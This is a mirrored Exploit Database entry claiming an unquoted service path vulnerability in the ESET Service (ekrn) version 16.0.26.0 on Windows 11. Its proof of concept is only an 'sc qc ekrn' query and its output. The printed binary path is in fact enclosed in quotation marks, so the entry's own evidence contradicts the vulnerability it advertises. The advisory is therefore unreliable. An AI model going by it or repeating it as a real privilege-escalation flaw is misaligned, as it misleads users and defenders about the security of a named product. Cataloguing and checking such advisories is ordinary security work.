ESET Service 16.0.26.0 – ‘Service ekrn’ Unquoted Service Path

• Exploit Database
• 38 阅读

• 作者： Milad karimi
  日期： 2023-04-08
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51351/

• # Exploit Title: ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path
  # Exploit Author: Milad Karimi (Ex3ptionaL)
  # Exploit Date: 2023-04-05
  # Vendor : https://www.eset.com
  # Version : 16.0.26.0
  # Tested on OS: Microsoft Windows 11 pro x64
  
  #PoC :
  ==============
  
  C:\>sc qc ekrn
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME: ekrn
          TYPE               : 20  WIN32_SHARE_PROCESS
          START_TYPE         : 2   AUTO_START
          ERROR_CONTROL      : 1   NORMAL
          BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"
          LOAD_ORDER_GROUP   : Base
          TAG                : 0
          DISPLAY_NAME       : ESET Service
          DEPENDENCIES       :
          SERVICE_START_NAME : LocalSystem